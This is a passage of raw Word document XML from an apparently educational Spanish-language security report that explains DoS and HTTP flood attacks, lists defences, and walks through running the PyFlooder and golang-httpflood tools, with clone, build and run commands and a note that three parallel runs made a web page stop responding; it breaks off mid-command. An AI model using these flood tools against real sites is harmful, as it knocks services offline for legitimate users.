      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508DE2BE" w14:textId="4F6C524D" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099E25F3" w14:textId="4231BB5F" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EE0FC5" w14:textId="629F328A" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1062D378" w14:textId="61A04819" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFAD7EC" w14:textId="14D38E76" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130D09A8" w14:textId="21D73429" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F8CCC7" w14:textId="69C8BDDC" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55288F11" w14:textId="7061E05B" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E8F9E4" w14:textId="42CC2E37" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E15CE92" w14:textId="627772BA" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B793ED6" w14:textId="55DA9EDD" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0D5FA0" w14:textId="594F565B" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B0BA13" w14:textId="39EF1FDD" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A62D6A" w14:textId="50700E45" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E03F09" w14:textId="51E1D8B6" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60439E40" w14:textId="77777777" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F79C3CA" w14:textId="3D34955C" w:rsidR="004601B3" w:rsidRDefault="004601B3" w:rsidP="004601B3">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc128034189"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I+D+I</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="2552B414" w14:textId="70D32BF2" w:rsidR="00187F53" w:rsidRDefault="00187F53" w:rsidP="00187F53"/>
    <w:p w14:paraId="57172215" w14:textId="7AA4393A" w:rsidR="006845D3" w:rsidRDefault="00187F53">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc128034190"/>
      <w:r>
        <w:t>DOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="0934599D" w14:textId="77777777" w:rsidR="009D1FAA" w:rsidRPr="009D1FAA" w:rsidRDefault="009D1FAA" w:rsidP="009D1FAA"/>
    <w:p w14:paraId="5DD1CF96" w14:textId="44952745" w:rsidR="00187F53" w:rsidRDefault="00187F53" w:rsidP="009D1FAA">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este es un ataque en el que se intenta hacer que un sistema o red se vuelva </w:t>
      </w:r>
      <w:r w:rsidR="00157313">
        <w:t>inaccesible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para los usuarios </w:t>
      </w:r>
      <w:r w:rsidR="00157313">
        <w:t>legítimos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esto se logra inundando el sistema o red con una cantidad abrumadora de </w:t>
      </w:r>
      <w:r w:rsidR="00157313">
        <w:t>solicitudes</w:t>
      </w:r>
      <w:r>
        <w:t>, lo que hace que el servidor o dispositivo de destino no pueda procesar las solicitudes legitimas y se vuelva inoperable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55159D6F" w14:textId="77777777" w:rsidR="00187F53" w:rsidRPr="00E36576" w:rsidRDefault="00187F53" w:rsidP="009D1FAA">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00E36576">
        <w:t>Existen diferentes tipos de ataques DoS, incluyendo ataques por saturación de banda ancha, ataques por saturación de CPU y ataques por saturación de memoria. Todos estos ataques tienen como objetivo sobrecargar un sistema o red hasta el punto de que ya no pueda responder a las solicitudes legítimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39459366" w14:textId="77777777" w:rsidR="00187F53" w:rsidRPr="00E36576" w:rsidRDefault="00187F53" w:rsidP="009D1FAA">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00E36576">
        <w:t>Es importante tener en cuenta que los ataques DoS son ilegales y pueden tener graves consecuencias para los perpetradores. Además, pueden causar grandes pérdidas económicas y reputacionales para las víctimas del ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B44BEE" w14:textId="77777777" w:rsidR="00187F53" w:rsidRPr="00187F53" w:rsidRDefault="00187F53" w:rsidP="00187F53">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FC6ECB" w14:textId="4F33415B" w:rsidR="00C7508C" w:rsidRDefault="00C7508C" w:rsidP="00F929E6"/>
    <w:p w14:paraId="7C5F1134" w14:textId="31B25A79" w:rsidR="00C7508C" w:rsidRDefault="00494BC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc128034191"/>
      <w:r>
        <w:t>Explicación Flood HTTP -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="1C4CB91D" w14:textId="77777777" w:rsidR="00494BC7" w:rsidRDefault="00494BC7" w:rsidP="00494BC7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C6F0F4" w14:textId="11CC4679" w:rsidR="00494BC7" w:rsidRDefault="00C35C48" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>La inundación HTTP, es un tipo de ataque DoS. En esta caso el objetivo del atacante es saturar la aplicación web con una gran cantidad de visitas, en un ataque DDoS, los ataques serían desde varias m</w:t>
      </w:r>
      <w:r w:rsidR="00F07260">
        <w:t>áquinas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B83C3D" w14:textId="6C7DD496" w:rsidR="00F07260" w:rsidRDefault="00F07260" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Loa ataques flood también se conocen como de capa7, que hace referencia a la capa de aplicación del modelo OSI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325179AD" w14:textId="35C8C200" w:rsidR="00F07260" w:rsidRDefault="00F07260" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El objetivo de los </w:t>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:t>ataques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de capa 7 es siempre privar la red o el servidor de recursos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C1903C" w14:textId="242CF806" w:rsidR="00F07260" w:rsidRDefault="00F07260" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Cuando el hardware no cuenta con suficientes recursos, el cliente tarda más tiempo en responder a las peticiones. Durante un ataque HTTP flood, como el atacante envía una gran cantidad de solicitudes sin pausa, el sistema se sobrecarga, impidiendo el acceso al servicio y a la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63988C17" w14:textId="169CE245" w:rsidR="00F07260" w:rsidRDefault="00F07260" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Los ataques HTTP flood se basan en las peticiones GET y POST del cliente, El cliente, es decir, el navegador que quiere acceder al sitio web, envía una de estas solicitudes. El servidor las procesa y a su vez, envía las respuesta al cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA13089" w14:textId="4FD47990" w:rsidR="00F07260" w:rsidRDefault="00F07260" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Las peticiones GET recuperan contenido estático, como imágenes o bloques de texto. En cambio, las peticiones POST se utilizan para acceder a recursos dinámicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110DAD6" w14:textId="2FEA9C0C" w:rsidR="00F07260" w:rsidRDefault="00F07260" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>En otras palabras, el método GET recibe datos del servidor y el método POST envía datos al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671331A" w14:textId="456C42E0" w:rsidR="00F07260" w:rsidRDefault="00F07260" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ambos pueden utilizarse para realizar este tipo de ataque, aunque el método POST se emplea con más frecuencia, porque requiere un procesamiento complejo por parte </w:t>
      </w:r>
      <w:r w:rsidR="00AC03DB">
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E575A" w14:textId="5ECBB8A5" w:rsidR="00AC03DB" w:rsidRDefault="00AC03DB" w:rsidP="00C35C48">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Defensa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877724D" w14:textId="70894249" w:rsidR="00AC03DB" w:rsidRDefault="00AC03DB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Los cortafuegos pueden identificar y bloquear las peticiones IP sospechosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0D285" w14:textId="4F1AD440" w:rsidR="00AC03DB" w:rsidRDefault="00AC03DB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Se puede usar captcha, el cual solo debería poder superar un humano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE08A78" w14:textId="3671C3AB" w:rsidR="00494BC7" w:rsidRDefault="00AC03DB" w:rsidP="00F929E6">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE745E" w14:textId="0A233BB4" w:rsidR="00494BC7" w:rsidRDefault="00494BC7" w:rsidP="00F929E6"/>
    <w:p w14:paraId="04B61E1E" w14:textId="77777777" w:rsidR="00494BC7" w:rsidRDefault="00494BC7" w:rsidP="00F929E6"/>
    <w:p w14:paraId="13E8A9D3" w14:textId="77777777" w:rsidR="00BC6B8F" w:rsidRDefault="00BC6B8F" w:rsidP="00BC6B8F">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F98D585" w14:textId="57A6AD9B" w:rsidR="00BC6B8F" w:rsidRDefault="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc128034192"/>
      <w:r>
        <w:t>Ataque de DoS HTTP Flood con PyFlooder:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305EFC5C" w14:textId="77777777" w:rsidR="00B02351" w:rsidRPr="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351"/>
    <w:p w14:paraId="51FEFD49" w14:textId="3E7FAF57" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El enlace para descargar este script es : </w:t>
      </w:r>
      <w:hyperlink r:id="rId329" w:history="1">
        <w:r w:rsidRPr="009A6254">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/D4Vinci/PyFlooder.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="437661C4" w14:textId="77777777" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E3009F" w14:textId="21AAFD5E" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tendríamos que hacer sudo git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId330" w:history="1">
        <w:r w:rsidRPr="009A6254">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/D4Vinci/PyFlooder.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="786D8C8E" w14:textId="6FE7C381" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2944264C" w14:textId="1A3CFF5F" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Después </w:t>
      </w:r>
      <w:r w:rsidRPr="00D929A0">
        <w:t>cd PyFlooder/</w:t>
      </w:r>
      <w:r>
        <w:t>, para movernos a esa carpeta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311DA486" w14:textId="593D6752" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B188F0" w14:textId="7FE3B5B2" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="00D929A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="411EC3D7" wp14:editId="544BED84">
            <wp:extent cx="4955003" cy="952885"/>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955003" cy="952885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE5836" w14:textId="6A4AF4D8" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589FEB84" w14:textId="3CD8DBB0" w:rsidR="00D929A0" w:rsidRDefault="00D929A0" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Este sería el comando a ejecutar: ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>python pyflooder &lt;ip&gt; &lt;puerto&gt; &lt;</w:t>
      </w:r>
      <w:r w:rsidR="008B0253" w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>número</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve"> ataques&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00A35626">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA605CE" w14:textId="77777777" w:rsidR="008B0253" w:rsidRDefault="008B0253" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B693EE" w14:textId="1A507732" w:rsidR="00A35626" w:rsidRDefault="00A35626" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="00A35626">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F5C806B" wp14:editId="2B3192F3">
            <wp:extent cx="5400040" cy="145415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1454150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF97050" w14:textId="1F3E43C1" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="00D0354B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF535AB" wp14:editId="445E73A9">
            <wp:extent cx="5400040" cy="2529840"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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00040" cy="2529840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9F4B8" w14:textId="22EDF3C3" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C762F7C" w14:textId="3D3FE9FC" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Solo se consigue que la página vaya un poco más lenta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58004E26" w14:textId="23720F5F" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C46B74" w14:textId="6BCBB6F6" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00D0354B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56F2CC2A" wp14:editId="6E081468">
            <wp:extent cx="5400040" cy="2533650"/>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040" cy="2533650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0136FE92" w14:textId="35D0DC9D" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745332EA" w14:textId="6670C507" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Haciendo tres ataques a la vez consigo que la web no responda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F43926F" w14:textId="77777777" w:rsidR="008B0253" w:rsidRDefault="008B0253" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32DB42A7" w14:textId="294B9258" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A475B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="533A04BF" wp14:editId="05CDAA88">
            <wp:extent cx="5400040" cy="2902585"/>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00040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC4802" w14:textId="77777777" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44419A23" w14:textId="77777777" w:rsidR="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAD4D2B" w14:textId="77777777" w:rsidR="00B02351" w:rsidRPr="00EB65F4" w:rsidRDefault="00B02351" w:rsidP="00D929A0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAA79B3" w14:textId="77777777" w:rsidR="00EB65F4" w:rsidRDefault="00EB65F4" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194A664A" w14:textId="5888FCA0" w:rsidR="00233BD8" w:rsidRDefault="00233BD8" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24983EC1" w14:textId="7FAC43DB" w:rsidR="00D0354B" w:rsidRDefault="00D0354B" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF6C53E" w14:textId="1BF9B7C3" w:rsidR="00D0354B" w:rsidRDefault="00D0354B" w:rsidP="00FC10D7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DCD92B" w14:textId="5B8410E0" w:rsidR="00A475B5" w:rsidRDefault="00A475B5" w:rsidP="002A0D7B"/>
    <w:p w14:paraId="74883B70" w14:textId="775E1338" w:rsidR="00A475B5" w:rsidRDefault="00B37062">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc128034193"/>
      <w:r>
        <w:t xml:space="preserve">Ataque </w:t>
      </w:r>
      <w:r w:rsidR="000D2024">
        <w:t xml:space="preserve">DoS </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP Flood con </w:t>
      </w:r>
      <w:r w:rsidR="00A475B5">
        <w:t xml:space="preserve"> Golang-httpflood:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidR="00A475B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21CF5D" w14:textId="77777777" w:rsidR="00B02351" w:rsidRPr="00B02351" w:rsidRDefault="00B02351" w:rsidP="00B02351"/>
    <w:p w14:paraId="1DA6A30B" w14:textId="6CF4CC3E" w:rsidR="00A475B5" w:rsidRDefault="00000000" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:hyperlink r:id="rId336" w:history="1">
        <w:r w:rsidR="00A475B5" w:rsidRPr="009A6254">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/Leeon123/golang-httpflood.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="756ACF23" w14:textId="726D10F2" w:rsidR="00A475B5" w:rsidRDefault="00A475B5" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Los pasos para descargarlo son los mismos que en el anterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950281B" w14:textId="544FC7C3" w:rsidR="00A475B5" w:rsidRDefault="00A475B5" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora tenemos que hacer el comando ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>sudo go build httpflood.go’</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF5A3C" w14:textId="3A9C8A92" w:rsidR="00A475B5" w:rsidRDefault="00A475B5" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="00A475B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC1E3FE" wp14:editId="585471BF">
            <wp:extent cx="4793012" cy="1476972"/>
            <wp:effectExtent l="0" t="0" r="7620" b="952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793012" cy="1476972"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="227CE93E" w14:textId="0755B826" w:rsidR="00A475B5" w:rsidRDefault="00A475B5" w:rsidP="00B02351">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de ejecutar, tendremos que usar este comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="009C1D31">
        <w:t>‘</w:t>
